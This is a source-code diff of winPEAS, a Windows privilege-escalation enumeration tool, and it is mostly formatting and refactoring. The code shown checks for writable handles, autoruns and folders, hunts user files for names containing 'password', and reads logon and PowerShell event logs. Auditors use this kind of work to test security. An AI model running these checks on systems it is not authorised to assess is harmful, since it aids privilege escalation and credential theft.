 using System.Runtime.InteropServices;
 using System.Security.Principal;
 using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.Helpers
 {
@@ -244,7 +242,7 @@ namespace winPEAS.Helpers
             {
 
                 string perm = PermissionsHelper.PermInt2Str((int)h.GrantedAccess, PermissionType.WRITEABLE_OR_EQUIVALENT);
-                if (perm != null && perm.Length> 0)
+                if (perm != null && perm.Length > 0)
                 {
                     vulnHandler.isVuln = true;
                     vulnHandler.reason = perm;
@@ -438,9 +436,11 @@ namespace winPEAS.Helpers
         // Get the owner of a process given the PID
         public static Dictionary<string, string> GetProcU(Process p)
         {
-            Dictionary<string, string> data = new Dictionary<string, string>();
+            Dictionary<string, string> data = new Dictionary<string, string>
-            data["name"] = "";
+            {
-            data["sid"] = "";
+                ["name"] = "",
+                ["sid"] = ""
+            };
             IntPtr pHandle = IntPtr.Zero;
             try
             {
@@ -471,7 +471,7 @@ namespace winPEAS.Helpers
             PT_RELEVANT_INFO pri = new PT_RELEVANT_INFO();
 
             Process proc = Process.GetProcessById(pid);
-            Dictionary<string,string> user = GetProcU(proc);
+            Dictionary<string, string> user = GetProcU(proc);
 
             StringBuilder fileName = new StringBuilder(2000);
             Native.Psapi.GetProcessImageFileName(proc.Handle, fileName, 2000);
@@ -586,7 +586,7 @@ namespace winPEAS.Helpers
             { // This shouldn't be needed
                 if (path.StartsWith("\\"))
                     path = path.Substring(1);
-                hive = Helpers.Registry.RegistryHelper.CheckIfExists(path);
+                hive = Registry.RegistryHelper.CheckIfExists(path);
             }
 
             if (path.StartsWith("\\"))

winPEAS/winPEASexe/winPEAS/Helpers/MemoryHelper.cs

@@ -1,5 +1,4 @@
-using System;
+using System.Diagnostics;
-using System.Diagnostics;
 
 namespace winPEAS.Helpers
 {

winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs

@@ -76,7 +76,7 @@ namespace winPEAS.Helpers
             }
 
             //Check if rundll32
-            string[] binaryPathdll32 = binaryPath.Split(new string[] {"Rundll32.exe"}, StringSplitOptions.None);
+            string[] binaryPathdll32 = binaryPath.Split(new string[] { "Rundll32.exe" }, StringSplitOptions.None);
 
             if (binaryPathdll32.Length > 1)
             {
@@ -224,7 +224,7 @@ namespace winPEAS.Helpers
             return strOutput;
         }
 
-        private static string[] suffixes = new[] {" B", " KB", " MB", " GB", " TB", " PB"};
+        private static string[] suffixes = new[] { " B", " KB", " MB", " GB", " TB", " PB" };
 
         public static string ConvertBytesToHumanReadable(double number, int precision = 2)
         {

winPEAS/winPEASexe/winPEAS/Helpers/PermissionsHelper.cs

@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Security.AccessControl;
 using System.Security.Principal;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 
 namespace winPEAS.Helpers
 {
@@ -354,14 +354,17 @@ namespace winPEAS.Helpers
                 results[path] = String.Join(", ", GetPermissionsFolder(path, Checks.Checks.CurrentUserSiDs));
                 if (string.IsNullOrEmpty(results[path]))
                 {
-                    foreach (string d in Directory.EnumerateDirectories(path))
+                    if (Directory.Exists(path))
                     {
-                        foreach (string f in Directory.EnumerateFiles(d))
+                        foreach (string d in Directory.EnumerateDirectories(path))
                         {
-                            results[f] = String.Join(", ", GetPermissionsFile(f, Checks.Checks.CurrentUserSiDs));
+                            foreach (string f in Directory.EnumerateFiles(d))
+                            {
+                                results[f] = String.Join(", ", GetPermissionsFile(f, Checks.Checks.CurrentUserSiDs));
+                            }
+                            cont += 1;
+                            results.Concat(GetRecursivePrivs(d, cont)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
                         }
-                        cont += 1;
-                        results.Concat(GetRecursivePrivs(d, cont)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
                     }
                 }
             }

winPEAS/winPEASexe/winPEAS/Helpers/ProgressBar.cs

@@ -4,85 +4,85 @@ using System.Threading;
 
 namespace winPEAS.Helpers
 {
-		internal class ProgressBar : IDisposable, IProgress<double>
+    internal class ProgressBar : IDisposable, IProgress<double>
-	{
+    {
-		private const int blockCount = 10;
+        private const int blockCount = 10;
-		private readonly TimeSpan animationInterval = TimeSpan.FromSeconds(1.0 / 8);
+        private readonly TimeSpan animationInterval = TimeSpan.FromSeconds(1.0 / 8);
-		private const string animation = @"|/-\";
+        private const string animation = @"|/-\";
 
-		private readonly Timer timer;
+        private readonly Timer timer;
 
-		private double currentProgress = 0;
+        private double currentProgress = 0;
-		private string currentText = string.Empty;
+        private string currentText = string.Empty;
-		private bool disposed = false;
+        private bool disposed = false;
-		private int animationIndex = 0;
+        private int animationIndex = 0;
 
-		public ProgressBar()
+        public ProgressBar()
-		{
+        {
-			timer = new Timer(TimerHandler, new object(), animationInterval, animationInterval);
+            timer = new Timer(TimerHandler, new object(), animationInterval, animationInterval);
-		}
+        }
 
-		public void Report(double value)
+        public void Report(double value)
-		{
+        {
-			// Make sure value is in [0..1] range
+            // Make sure value is in [0..1] range
-			value = Math.Max(0, Math.Min(1, value));
+            value = Math.Max(0, Math.Min(1, value));
-			Interlocked.Exchange(ref currentProgress, value);
+            Interlocked.Exchange(ref currentProgress, value);
-		}
+        }
 
-		private void TimerHandler(object state)
+        private void TimerHandler(object state)
-		{
+        {
-			lock (timer)
+            lock (timer)
-			{
+            {
-				if (disposed) return;
+                if (disposed) return;
 
-				int progressBlockCount = (int)(currentProgress * blockCount);
+                int progressBlockCount = (int)(currentProgress * blockCount);
-				int percent = (int)(currentProgress * 100);
+                int percent = (int)(currentProgress * 100);
-				string text = string.Format("[{0}{1}] {2,3}% {3}",
+                string text = string.Format("[{0}{1}] {2,3}% {3}",
-					new string('#', progressBlockCount), new string('-', blockCount - progressBlockCount),
+                    new string('#', progressBlockCount), new string('-', blockCount - progressBlockCount),
-					percent,
+                    percent,
-					animation[animationIndex++ % animation.Length]);
+                    animation[animationIndex++ % animation.Length]);
-				UpdateText(text);
+                UpdateText(text);
-			}
+            }
-		}
+        }
 
-		private void UpdateText(string text)
+        private void UpdateText(string text)
-		{
+        {
-			// Get length of common portion
+            // Get length of common portion
-			int commonPrefixLength = 0;
+            int commonPrefixLength = 0;
-			int commonLength = Math.Min(currentText.Length, text.Length);
+            int commonLength = Math.Min(currentText.Length, text.Length);
-			while (commonPrefixLength < commonLength && text[commonPrefixLength] == currentText[commonPrefixLength])
+            while (commonPrefixLength < commonLength && text[commonPrefixLength] == currentText[commonPrefixLength])
-			{
+            {
-				commonPrefixLength++;
+                commonPrefixLength++;
-			}
+            }
 
-			// Backtrack to the first differing character
+            // Backtrack to the first differing character
-			StringBuilder outputBuilder = new StringBuilder();
+            StringBuilder outputBuilder = new StringBuilder();
-			outputBuilder.Append('\b', currentText.Length - commonPrefixLength);
+            outputBuilder.Append('\b', currentText.Length - commonPrefixLength);
 
-			// Output new suffix
+            // Output new suffix
-			outputBuilder.Append(text.Substring(commonPrefixLength));
+            outputBuilder.Append(text.Substring(commonPrefixLength));
 
-			// If the new text is shorter than the old one: delete overlapping characters
+            // If the new text is shorter than the old one: delete overlapping characters
-			int overlapCount = currentText.Length - text.Length;
+            int overlapCount = currentText.Length - text.Length;
-			if (overlapCount > 0)
+            if (overlapCount > 0)
-			{
+            {
-				outputBuilder.Append(' ', overlapCount);
+                outputBuilder.Append(' ', overlapCount);
-				outputBuilder.Append('\b', overlapCount);
+                outputBuilder.Append('\b', overlapCount);
-			}
+            }
 
-			Console.Write(outputBuilder);
+            Console.Write(outputBuilder);
-			currentText = text;
+            currentText = text;
-		}
+        }
 
-		public void Dispose()
+        public void Dispose()
-		{
+        {
-			lock (timer)
+            lock (timer)
-			{
+            {
-				disposed = true;
+                disposed = true;
-				UpdateText(string.Empty);
+                UpdateText(string.Empty);
-				timer.Dispose();
+                timer.Dispose();
-			}
+            }
-		}
+        }
 
-	}
+    }
 }

winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs

@@ -1,7 +1,7 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.Linq;
-using Microsoft.Win32;
 
 namespace winPEAS.Helpers.Registry
 {
@@ -177,7 +177,7 @@ namespace winPEAS.Helpers.Registry
 
         internal static uint? GetDwordValue(string hive, string key, string val)
         {
-            string strValue = RegistryHelper.GetRegValue(hive, key, val);
+            string strValue = GetRegValue(hive, key, val);
 
             if (uint.TryParse(strValue, out uint res))
             {

winPEAS/winPEASexe/winPEAS/Helpers/Search/Patterns.cs

@@ -3,7 +3,7 @@
 namespace winPEAS.Helpers.Search
 {
     static class Patterns
-    {        
+    {
         public static readonly HashSet<string> WhitelistExtensions = new HashSet<string>()
         {
             ".cer",
@@ -11,7 +11,7 @@ namespace winPEAS.Helpers.Search
             ".der",
             ".p12",
         };
-      
+
         public static readonly HashSet<string> WhiteListExactfilenamesWithExtensions = new HashSet<string>()
         {
             "docker-compose.yml",
@@ -21,6 +21,6 @@ namespace winPEAS.Helpers.Search
         public static readonly IList<string> WhiteListRegexp = new List<string>()
         {
             "config.*\\.php$",
-        };       
+        };
     }
 }

winPEAS/winPEASexe/winPEAS/Helpers/Search/SearchHelper.cs

@@ -92,13 +92,13 @@ namespace winPEAS.Helpers.Search
                                     Beaprint.LongPathWarning(f.FullName);
                             }
                         }
-                        ) ;
+                        );
                 });
             });
 
             return files.ToList();
-        }
+        }
-       
+
         private static List<FileInfo> GetFiles(string folder, string pattern = "*")
         {
             DirectoryInfo dirInfo;
@@ -221,43 +221,43 @@ namespace winPEAS.Helpers.Search
         {
             // c:\users
             string rootUsersSearchPath = $"{SystemDrive}\\Users\\";
-            SearchHelper.RootDirUsers = SearchHelper.GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirUsers = GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
 
             // c:\users\current_user
             string rootCurrentUserSearchPath = Environment.GetEnvironmentVariable("USERPROFILE");
-            SearchHelper.RootDirCurrentUser = SearchHelper.GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
+            RootDirCurrentUser = GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Program Files\
             string rootProgramFiles = $"{SystemDrive}\\Program Files\\";
-            SearchHelper.ProgramFiles = SearchHelper.GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
+            ProgramFiles = GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Program Files (x86)\
             string rootProgramFilesX86 = $"{SystemDrive}\\Program Files (x86)\\";
-            SearchHelper.ProgramFilesX86 = SearchHelper.GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
+            ProgramFilesX86 = GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Documents and Settings\
             string documentsAndSettings = $"{SystemDrive}\\Documents and Settings\\";
-            SearchHelper.DocumentsAndSettings = SearchHelper.GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
+            DocumentsAndSettings = GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
 
             // c:\ProgramData\Microsoft\Group Policy\History
             string groupPolicyHistory = $"{SystemDrive}\\ProgramData\\Microsoft\\Group Policy\\History";
-            SearchHelper.GroupPolicyHistory = SearchHelper.GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
+            GroupPolicyHistory = GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
 
             // c:\Documents and Settings\All Users\Application Data\\Microsoft\\Group Policy\\History
             string groupPolicyHistoryLegacy = $"{documentsAndSettings}\\All Users\\Application Data\\Microsoft\\Group Policy\\History";
             //SearchHelper.GroupPolicyHistoryLegacy = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, globalPattern);
-            var groupPolicyHistoryLegacyFiles = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
+            var groupPolicyHistoryLegacyFiles = GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
-            SearchHelper.GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
+            GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
         }
 
         internal static void CleanLists()
         {
-            SearchHelper.RootDirUsers = null;
+            RootDirUsers = null;
-            SearchHelper.RootDirCurrentUser = null;
+            RootDirCurrentUser = null;
-            SearchHelper.ProgramFiles = null;
+            ProgramFiles = null;
-            SearchHelper.ProgramFilesX86 = null;
+            ProgramFilesX86 = null;
-            SearchHelper.DocumentsAndSettings = null;
+            DocumentsAndSettings = null;
-            SearchHelper.GroupPolicyHistory = null;
+            GroupPolicyHistory = null;
 
             GC.Collect();
         }
@@ -270,10 +270,10 @@ namespace winPEAS.Helpers.Search
                 ".*password.*"
             };
 
-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
-            {                
+            {
-                //string extLower = file.Extension.ToLower();
+                //string extLower = file.Extension.ToLower();
-
+
                 if (!file.IsDirectory)
                 {
                     string nameLower = file.Filename.ToLower();
@@ -297,7 +297,7 @@ namespace winPEAS.Helpers.Search
         {
             var result = new List<string>();
 
-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
             {
                 if (!file.IsDirectory)
                 {
@@ -322,7 +322,7 @@ namespace winPEAS.Helpers.Search
                         }
                     }
 
-                }               
+                }
             }
 
             return result;
@@ -337,7 +337,7 @@ namespace winPEAS.Helpers.Search
                 ".xml"
             };
 
-            foreach (var file in SearchHelper.GroupPolicyHistory)
+            foreach (var file in GroupPolicyHistory)
             {
                 if (!file.IsDirectory)
                 {
@@ -361,14 +361,14 @@ namespace winPEAS.Helpers.Search
             };
 
             string programDataPath = $"{SystemDrive}\\ProgramData\\";
-            var programData = SearchHelper.GetFilesFast(programDataPath, GlobalPattern);
+            var programData = GetFilesFast(programDataPath, GlobalPattern);
 
             var searchFiles = new List<CustomFileInfo>();
-            searchFiles.AddRange(SearchHelper.ProgramFiles);
+            searchFiles.AddRange(ProgramFiles);
-            searchFiles.AddRange(SearchHelper.ProgramFilesX86);
+            searchFiles.AddRange(ProgramFilesX86);
             searchFiles.AddRange(programData);
-            searchFiles.AddRange(SearchHelper.DocumentsAndSettings);
+            searchFiles.AddRange(DocumentsAndSettings);
-            searchFiles.AddRange(SearchHelper.RootDirUsers);
+            searchFiles.AddRange(RootDirUsers);
 
             foreach (var file in searchFiles)
             {
@@ -403,7 +403,7 @@ namespace winPEAS.Helpers.Search
                 ".pdf",
             };
 
-            foreach (var file in SearchHelper.RootDirCurrentUser)
+            foreach (var file in RootDirCurrentUser)
             {
                 if (!file.IsDirectory)
                 {
@@ -426,7 +426,7 @@ namespace winPEAS.Helpers.Search
                             }
                         }
                     }
-                }               
+                }
             }
 
             return result;
@@ -451,7 +451,7 @@ namespace winPEAS.Helpers.Search
                 ".pdf",
             };
 
-            foreach (var file in SearchHelper.RootDirUsers)
+            foreach (var file in RootDirUsers)
             {
                 if (!file.IsDirectory)
                 {
@@ -474,7 +474,7 @@ namespace winPEAS.Helpers.Search
                             }
                         }
                     }
-                }               
+                }
             }
 
             return result;

winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfig.cs

@@ -8,12 +8,13 @@ namespace winPEAS.Helpers.YamlConfig
         {
             public string name { get; set; }
             public RegularExpression[] regexes { get; set; }
-            public class RegularExpression {
+            public class RegularExpression
+            {
                 public string name { get; set; }
                 public string regex { get; set; }
 
                 public bool caseinsensitive { get; set; }
-                
+
                 public string disable { get; set; }
             }
         }
@@ -25,65 +26,65 @@ namespace winPEAS.Helpers.YamlConfig
 
         public class FileParam
         {
-            public string name { get; set;  }
+            public string name { get; set; }
-            public FileSettings value { get; set;  }
+            public FileSettings value { get; set; }
-        }       
+        }
 
         public class SearchParameters
-        {            
+        {
             public class FileSettings
-            {               
+            {
-                public string bad_regex { get; set;  }
+                public string bad_regex { get; set; }
                 // public string check_extra_path { get; set;  }    // not used in Winpeas
-                public string good_regex { get; set;  }
+                public string good_regex { get; set; }
-                public bool? just_list_file { get; set;  }
+                public bool? just_list_file { get; set; }
-                public string line_grep { get; set;  }
+                public string line_grep { get; set; }
-                public bool? only_bad_lines { get; set;  }                
+                public bool? only_bad_lines { get; set; }
-                public bool? remove_empty_lines { get; set;  }
+                public bool? remove_empty_lines { get; set; }
                 // public string remove_path { get; set;  }     // not used in Winpeas
-                public string remove_regex { get; set;  }
+                public string remove_regex { get; set; }
                 public string remove_path { get; set; }
                 // public string[] search_in { get; set;  }   // not used in Winpeas
-                public string type { get; set;  }                                
+                public string type { get; set; }
-                public FileParam[] files { get; set;  }
+                public FileParam[] files { get; set; }
             }
 
             public class FileParameters
             {
-                public string file { get; set;  }
+                public string file { get; set; }
-                public FileSettings options { get; set;  }
+                public FileSettings options { get; set; }
             }
 
             public class Config
             {
-                public bool auto_check { get; set;  }
+                public bool auto_check { get; set; }
             }
 
-            public Config config { get; set;  }
+            public Config config { get; set; }
-            public string[] disable { get; set;  }       // disabled scripts - linpeas/winpeas
+            public string[] disable { get; set; }       // disabled scripts - linpeas/winpeas
-            public FileParam[] files { get; set;  }
+            public FileParam[] files { get; set; }
         }
 
         public class SearchParams
         {
-            public string name { get; set;  }
+            public string name { get; set; }
-            public SearchParameters value { get; set;  }
+            public SearchParameters value { get; set; }
         }
 
         public class Defaults
         {
-            public bool auto_check { get; set;  }
+            public bool auto_check { get; set; }
-            public string bad_regex { get; set;  }
+            public string bad_regex { get; set; }
             //public string check_extra_path { get; set;  }  not used in winpeas
-            public string good_regex { get; set;  }
+            public string good_regex { get; set; }
-            public bool just_list_file { get; set;  }
+            public bool just_list_file { get; set; }
-            public string line_grep { get; set;  }
+            public string line_grep { get; set; }
-            public bool only_bad_lines { get; set;  }
+            public bool only_bad_lines { get; set; }
-            public bool remove_empty_lines { get; set;  }
+            public bool remove_empty_lines { get; set; }
-            public string remove_path { get; set;  }
+            public string remove_path { get; set; }
-            public string remove_regex { get; set;  }
+            public string remove_regex { get; set; }
-            public string[] search_in { get; set;  }
+            public string[] search_in { get; set; }
-            public string type { get; set;  }    
+            public string type { get; set; }
         }
 
         public class Variable
@@ -92,9 +93,9 @@ namespace winPEAS.Helpers.YamlConfig
             public string value { get; set; }
         }
 
-        public SearchParams[] search { get; set;  }
+        public SearchParams[] search { get; set; }
-       
+
-        public Defaults defaults { get; set;  }
+        public Defaults defaults { get; set; }
 
         public Variable[] variables { get; set; }
     }

winPEAS/winPEASexe/winPEAS/Helpers/YamlConfig/YamlConfigHelper.cs

@@ -1,10 +1,9 @@
 using System.Collections.Generic;
-using System.Yaml.Serialization;
 using System.IO;
-using System.Reflection;
 using System.Linq;
+using System.Reflection;
+using System.Yaml.Serialization;
 using static winPEAS.Helpers.YamlConfig.YamlConfig;
-using static winPEAS.Helpers.YamlConfig.YamlRegexConfig;
 
 
 namespace winPEAS.Helpers.YamlConfig
@@ -30,7 +29,7 @@ namespace winPEAS.Helpers.YamlConfig
                     YamlRegexConfig yamlConfig = (YamlRegexConfig)yamlSerializer.Deserialize(configFileContent, typeof(YamlRegexConfig))[0];
 
                     // check
-                   if (yamlConfig.regular_expresions == null || yamlConfig.regular_expresions.Length == 0)
+                    if (yamlConfig.regular_expresions == null || yamlConfig.regular_expresions.Length == 0)
                     {
                         throw new System.Exception("No configuration was read");
                     }
@@ -79,7 +78,7 @@ namespace winPEAS.Helpers.YamlConfig
 
                     // apply the defaults e.g. for filesearch
                     foreach (var searchItem in yamlConfig.search)
-                    {                                                
+                    {
                         SetDefaultOptions(searchItem, yamlConfig.defaults);
                     }
 
@@ -91,7 +90,7 @@ namespace winPEAS.Helpers.YamlConfig
                 Beaprint.PrintException($"An exception occured while parsing sensitive_files.yaml configuration file: {e.Message}");
 
                 throw;
-            }                   
+            }
         }
 
         private static void SetDefaultOptions(SearchParams searchItem, Defaults defaults)
@@ -106,7 +105,7 @@ namespace winPEAS.Helpers.YamlConfig
             foreach (var fileParam in fileParams)
             {
                 var value = fileParam.value;
-                
+
                 value.bad_regex = GetValueOrDefault(value.bad_regex, defaults.bad_regex);
                 value.good_regex = GetValueOrDefault(value.good_regex, defaults.good_regex);
                 value.just_list_file = GetValueOrDefault(value.just_list_file, defaults.just_list_file);
@@ -135,7 +134,7 @@ namespace winPEAS.Helpers.YamlConfig
 
         private static T GetValueOrDefault<T>(T val, T defaultValue)
         {
-            return val == null ? defaultValue : val;           
+            return val == null ? defaultValue : val;
         }
 
         private static T GetValueOrDefault<T>(Dictionary<object, object> dict, string key, T defaultValue)

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/ApplicationInfoHelper.cs

@@ -1,6 +1,5 @@
 using System;
 using System.Collections.Generic;
-using System.Runtime.InteropServices;
 using System.Text;
 using winPEAS.Helpers;
 using winPEAS.Native;
@@ -10,7 +9,7 @@ namespace winPEAS.Info.ApplicationInfo
 {
     internal class ApplicationInfoHelper
     {
-        
+
         public static string GetActiveWindowTitle()
         {
             const int nChars = 256;
@@ -46,7 +45,7 @@ namespace winPEAS.Info.ApplicationInfo
             {
                 try
                 {
-                    if (t.Enabled && 
+                    if (t.Enabled &&
                         !string.IsNullOrEmpty(t.Path) && !t.Path.Contains("Microsoft") &&
                         !string.IsNullOrEmpty(t.Definition.RegistrationInfo.Author) &&
                         !t.Definition.RegistrationInfo.Author.Contains("Microsoft"))

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs

@@ -1,10 +1,10 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Management;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -204,7 +204,7 @@ namespace winPEAS.Info.ApplicationInfo
                             {
                                 autorunLocationKey[0], autorunLocationKey[1] + "\\" + clsid_name, autorunLocationKey[2]
                             }
-                            : new List<string> {autorunLocationKey[0], autorunLocationKey[1] + "\\" + clsid_name});
+                            : new List<string> { autorunLocationKey[0], autorunLocationKey[1] + "\\" + clsid_name });
                     }
                 }
 
@@ -243,10 +243,10 @@ namespace winPEAS.Info.ApplicationInfo
                             string folder = Path.GetDirectoryName(filepath_cleaned);
 
                             try
-                            { 
+                            {
                                 //If the path doesn't exist, pass
                                 if (File.GetAttributes(filepath_cleaned).HasFlag(FileAttributes.Directory))
-                                { 
+                                {
                                     //If the path is already a folder, change the values of the params
                                     orig_filepath = "";
                                     folder = filepath_cleaned;
@@ -336,7 +336,7 @@ namespace winPEAS.Info.ApplicationInfo
             var systemDrive = Environment.GetEnvironmentVariable("SystemDrive");
             var autorunLocations = new List<string>
             {
-                Environment.ExpandEnvironmentVariables(@"%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"),               
+                Environment.ExpandEnvironmentVariables(@"%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"),
             };
 
             string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
@@ -344,15 +344,18 @@ namespace winPEAS.Info.ApplicationInfo
 
             try
             {
-                var userDirs = Directory.EnumerateDirectories(usersPath);
+                if (Directory.Exists(usersPath))
-
-                foreach (var userDir in userDirs)
                 {
-                    string startupPath = $@"{userDir}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup";
+                    var userDirs = Directory.EnumerateDirectories(usersPath);
 
-                    if (Directory.Exists(startupPath))
+                    foreach (var userDir in userDirs)
                     {
-                        autorunLocations.Add(startupPath);
+                        string startupPath = $@"{userDir}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup";
+
+                        if (Directory.Exists(startupPath))
+                        {
+                            autorunLocations.Add(startupPath);
+                        }
                     }
                 }
             }
@@ -364,22 +367,25 @@ namespace winPEAS.Info.ApplicationInfo
             {
                 try
                 {
-                    var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
+                    if (Directory.Exists(path))
-
-                    foreach (string filepath in files)
                     {
-                        string folder = Path.GetDirectoryName(filepath);
+                        var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
-                        results.Add(new Dictionary<string, string>() {
+
-                            { "Reg", "" },
+                        foreach (string filepath in files)
-                            { "RegKey", "" },
+                        {
-                            { "RegPermissions", "" },
+                            string folder = Path.GetDirectoryName(filepath);
-                            { "Folder", folder },
+                            results.Add(new Dictionary<string, string>() {
-                            { "File", filepath },
+                                { "Reg", "" },
-                            { "isWritableReg", ""},
+                                { "RegKey", "" },
-                            { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
+                                { "RegPermissions", "" },
-                            { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
+                                { "Folder", folder },
-                            { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+                                { "File", filepath },
-                        });
+                                { "isWritableReg", ""},
+                                { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
+                                { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
+                                { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+                            });
+                        }
                     }
                 }
                 catch (Exception)
@@ -477,7 +483,7 @@ namespace winPEAS.Info.ApplicationInfo
 
         private static IEnumerable<Dictionary<string, string>> GetAutoRunsFiles()
         {
-            var results = new List<Dictionary<string, string>>();            
+            var results = new List<Dictionary<string, string>>();
             var systemDrive = Environment.GetEnvironmentVariable("SystemDrive");
             var autostartFiles = new HashSet<string>
             {

winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/InstalledApps.cs

@@ -8,7 +8,7 @@ using winPEAS.Helpers.Registry;
 namespace winPEAS.Info.ApplicationInfo
 {
     internal static class InstalledApps
-    {        
+    {
         public static SortedDictionary<string, Dictionary<string, string>> GetInstalledAppsPerms()
         {
             //Get from Program Files
@@ -71,16 +71,19 @@ namespace winPEAS.Info.ApplicationInfo
             var results = new SortedDictionary<string, Dictionary<string, string>>();
             try
             {
-                foreach (string f in Directory.EnumerateFiles(fpath))
+                if (Directory.Exists(fpath))
                 {
-                    results[f] = new Dictionary<string, string>
+                    foreach (string f in Directory.EnumerateFiles(fpath))
+                    {
+                        results[f] = new Dictionary<string, string>
                     {
                         { f, string.Join(", ", PermissionsHelper.GetPermissionsFile(f, Checks.Checks.CurrentUserSiDs)) }
                     };
-                }
+                    }
-                foreach (string d in Directory.EnumerateDirectories(fpath))
+                    foreach (string d in Directory.EnumerateDirectories(fpath))
-                {
+                    {
-                    results[d] = PermissionsHelper.GetRecursivePrivs(d);
+                        results[d] = PermissionsHelper.GetRecursivePrivs(d);
+                    }
                 }
             }
             catch (Exception ex)

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/Logon/Logon.cs

@@ -18,12 +18,12 @@ namespace winPEAS.Info.EventsInfo.Logon
             var kerberosLoggedUsersSet = new HashSet<string>();
 
             string userRegex = null;
-            
+
             var startTime = DateTime.Now.AddDays(-lastDays);
             var endTime = DateTime.Now;
 
             var query = $@"*[System/EventID=4624] and *[System[TimeCreated[@SystemTime >= '{startTime.ToUniversalTime():o}']]] and *[System[TimeCreated[@SystemTime <= '{endTime.ToUniversalTime():o}']]]";
-            var logReader = MyUtils.GetEventLogReader("Security", query);            
+            var logReader = MyUtils.GetEventLogReader("Security", query);
 
             // read the event log
             for (var eventDetail = logReader.ReadEvent(); eventDetail != null; eventDetail = logReader.ReadEvent())
@@ -127,14 +127,14 @@ namespace winPEAS.Info.EventsInfo.Logon
             result.NTLMv2LoggedUsersSet = NTLMv2LoggedUsersSet;
             result.LogonEventInfos = logonEventInfos;
 
-            return result;            
+            return result;
         }
 
         public static IEnumerable<ExplicitLogonEventInfo> GetExplicitLogonEventsInfos(int lastDays)
         {
             const string eventId = "4648";
             string userFilterRegex = null;
-            
+
             var startTime = DateTime.Now.AddDays(-lastDays);
             var endTime = DateTime.Now;
 
@@ -143,7 +143,7 @@ namespace winPEAS.Info.EventsInfo.Logon
             var logReader = MyUtils.GetEventLogReader("Security", query);
 
             for (var eventDetail = logReader.ReadEvent(); eventDetail != null; eventDetail = logReader.ReadEvent())
-            {                
+            {
                 //string subjectUserSid = eventDetail.GetPropertyValue(0);
                 var subjectUserName = eventDetail.GetPropertyValue(1);
                 var subjectDomainName = eventDetail.GetPropertyValue(2);

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/Logon/LogonEventInfo.cs

@@ -40,6 +40,6 @@ namespace winPEAS.Info.EventsInfo.Logon
             LmPackage = lmPackage;
             TargetOutboundUserName = targetOutboundUserName;
             TargetOutboundDomainName = targetOutboundDomainName;
-        }        
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/PowerShell/PowerShell.cs

@@ -16,7 +16,7 @@ namespace winPEAS.Info.EventsInfo.PowerShell
             string[] powerShellLogs = { "Microsoft-Windows-PowerShell/Operational", "Windows PowerShell" };
 
             // Get our "sensitive" cmdline regexes from a common helper function.
-            var powerShellRegex = Common.GetInterestingProcessArgsRegex();           
+            var powerShellRegex = Common.GetInterestingProcessArgsRegex();
 
             foreach (var logName in powerShellLogs)
             {

winPEAS/winPEASexe/winPEAS/Info/EventsInfo/ProcessCreation/ProcessCreation.cs

@@ -1,15 +1,14 @@
 using System.Collections.Generic;
 using winPEAS.Helpers;
